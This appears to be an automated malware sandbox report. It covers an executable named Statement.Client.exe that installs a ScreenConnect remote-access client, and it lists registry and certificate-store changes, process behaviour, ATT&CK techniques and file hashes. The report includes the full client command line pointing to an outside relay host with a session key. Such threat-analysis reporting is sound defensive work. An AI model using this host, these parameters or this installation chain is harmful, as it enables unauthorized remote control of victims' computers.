Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\DigestValue = 1220987627782d3c3397d4abf01ac3777999e01c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\Files	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb09 = 30000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0003_777a2c14525b0976\appid = 68747470733a2f2f7365637572652e746f6465736b2e68656c702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\Files\ScreenConnect.Windows.dll_fc0d83aff7df0b5b = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\Transform = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft	dfsvc.exe
Key deleted	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb09 = 0000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_none_38bfca06a9457575\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_777a2c14525b0976	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\identity = 53637265656e436f6e6e6563742e436c69656e742c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\DigestMethod = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\NonCanonicalData	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071\implication!scre..tion_25b0fbb6ef7eb094_0018.0003_777a = 68747470733a2f2f7365637572652e746f6465736b2e68656c702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\SizeOfStronglyNamedComponent = 3b72080000000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\identity = 53637265656e436f6e6e6563742e57696e646f77732c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\Files\ScreenConnect.WindowsFileManager.exe_0e21f8 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0003_none_38bfca06a9457575\lock!04000000a9dc760ff4030000a806000000000000000000007 = 30303030303366342c30316462343766383838666631656130	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\SizeOfStronglyNamedComponent = e711030000000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071\DigestValue = f2d3160f15cfd0989091249a61132a369e44dea4	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\Files\ScreenConnect.Core.dll_b96889d378047e27 = 01	dfsvc.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	Statement.Client.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	Statement.Client.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	Statement.Client.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	Statement.Client.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2124	ScreenConnect.ClientService.exe
2124	ScreenConnect.ClientService.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1012	dfsvc.exe
Token: SeDebugPrivilege	2124	ScreenConnect.ClientService.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 2132 wrote to memory of 1012	2132	Statement.Client.exe	30
PID 2132 wrote to memory of 1012	2132	Statement.Client.exe	30
PID 2132 wrote to memory of 1012	2132	Statement.Client.exe	30
PID 2132 wrote to memory of 1012	2132	Statement.Client.exe	30
PID 1012 wrote to memory of 800	1012	dfsvc.exe	33
PID 1012 wrote to memory of 800	1012	dfsvc.exe	33
PID 1012 wrote to memory of 800	1012	dfsvc.exe	33
PID 1012 wrote to memory of 800	1012	dfsvc.exe	33
PID 800 wrote to memory of 3040	800	ScreenConnect.WindowsClient.exe	34
PID 800 wrote to memory of 3040	800	ScreenConnect.WindowsClient.exe	34
PID 800 wrote to memory of 3040	800	ScreenConnect.WindowsClient.exe	34
PID 800 wrote to memory of 3040	800	ScreenConnect.WindowsClient.exe	34
PID 2124 wrote to memory of 2212	2124	ScreenConnect.ClientService.exe	36
PID 2124 wrote to memory of 2212	2124	ScreenConnect.ClientService.exe	36
PID 2124 wrote to memory of 2212	2124	ScreenConnect.ClientService.exe	36
PID 2124 wrote to memory of 2212	2124	ScreenConnect.ClientService.exe	36
PID 2124 wrote to memory of 2212	2124	ScreenConnect.ClientService.exe	36

C:\Users\Admin\AppData\Local\Temp\Statement.Client.exe
"C:\Users\Admin\AppData\Local\Temp\Statement.Client.exe"
1⤵
- Manipulates Digital Signatures
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2132
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
  2⤵
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1012
- - C:\Users\Admin\AppData\Local\Apps\2.0\6PXN8640.0OC\HY6OTL7X.XJ3\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe
    "C:\Users\Admin\AppData\Local\Apps\2.0\6PXN8640.0OC\HY6OTL7X.XJ3\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:800
  - - C:\Users\Admin\AppData\Local\Apps\2.0\6PXN8640.0OC\HY6OTL7X.XJ3\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.ClientService.exe
      "C:\Users\Admin\AppData\Local\Apps\2.0\6PXN8640.0OC\HY6OTL7X.XJ3\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=242614d5-9b0d-42a9-99bd-6fcc80ac8cc3&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:3040

C:\Users\Admin\AppData\Local\Apps\2.0\6PXN8640.0OC\HY6OTL7X.XJ3\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.ClientService.exe
"C:\Users\Admin\AppData\Local\Apps\2.0\6PXN8640.0OC\HY6OTL7X.XJ3\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=242614d5-9b0d-42a9-99bd-6fcc80ac8cc3&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"
1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2124
- C:\Users\Admin\AppData\Local\Apps\2.0\6PXN8640.0OC\HY6OTL7X.XJ3\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe
  "C:\Users\Admin\AppData\Local\Apps\2.0\6PXN8640.0OC\HY6OTL7X.XJ3\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe" "RunRole" "e04d0d0b-1436-493e-b12c-f938e7524c56" "User"
  2⤵
  - Drops file in System32 directory
  - Executes dropped EXE
  PID:2212

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
acfda31c0ebb915bdabb8b1b8f08950f

SHA1
a4597f8c642bbab99f44c60adc1decff2f42593d

SHA256
d1ec94265144ece037f2f20ae47bbe8508e18621ea390416d2cd99f85153d721

SHA512
44e8bf5168d98be824571661a0271e9448f8749351abc3b450116df0337cd35b183037726d2f7e9261d6ecc80a9f2bb68df4a0ef519453b85ab9117c5f5ad652

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\6PXN8640.0OC\HY6OTL7X.XJ3\manifests\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92.cdf-ms

Filesize
24KB

MD5
65394d38334dfdf5612982c4ecabb339

SHA1
8d5838acb05522c3876cb4cabbe861bdb1655817

SHA256
21076148ca415deb5945da9c705f8912b2c365e115012abfb32b8f5d196a565c

SHA512
315e09c714b21764084f231f8a6352d001a368fe5bee0ca15a879c422de81f5d7f12779df9e6d9d1517ec5a0f68d760aaeb7187417663a1c89dd29519621963b

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\6PXN8640.0OC\HY6OTL7X.XJ3\manifests\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06.cdf-ms

Filesize
3KB

MD5
b21db4e3ecc99d0f21ad0fabfab4ae9c

SHA1
43d8060bd871c1f55ead408ad4d1ebcbd8f7b74d

SHA256
83ebaf97ccbd195807b4f31290d1dea546897c6169b1231a5a08692ba7db12f9

SHA512
d324f2edd8b0b1e7e699cdcdd61169d81b711986d7c4d92ef39efcc17eb64ab8d7c3a1825779117671a2b21501d5ce5459af9967085978d093cf5525def06f88

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\6PXN8640.0OC\HY6OTL7X.XJ3\manifests\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036.cdf-ms

Filesize
5KB

MD5
0c9761803fcb8061e17e645cdc222095

SHA1
e1b23b0beb9b67fb6581e5bb03c8905c97db2115

SHA256
b75eba3e0bd6acfeb14f4b149e594037da55c7847b36e75253cac8faf309b203

SHA512
29abe3896a86fa0ca9dc33fa049b96fcc89aa42aeb2ffb21cd4fea2d1875f27bc2b3884bf6c21de5d7cb97172353757a64268a0704e95602a4f34c7f13ee85fe

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\6PXN8640.0OC\HY6OTL7X.XJ3\manifests\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013.cdf-ms

Filesize
6KB

MD5
4f22e27adf1a7eacf3f22812a5716431

SHA1
0eadf5366813de2bd397b80989f39b3397ced454

SHA256
53f19cca79112a79f7dfcde65581322f97121a24827a552d0485e25f38282dfe

SHA512
c7f373effe3d26208a515bace7634c717ef54a5ad5aab19cb148dbaf22cfac41eefec6d9ed7c5f1575845c2f1c77f9f4a90e1caf801a84a65e9d4c87d789833b

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\6PXN8640.0OC\HY6OTL7X.XJ3\manifests\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a.cdf-ms

Filesize
2KB

MD5
f6f58b667b35b0c2205521b8719c295c

SHA1
653ebdb99bda0886cfbc268460fe20d8a03f5794

SHA256
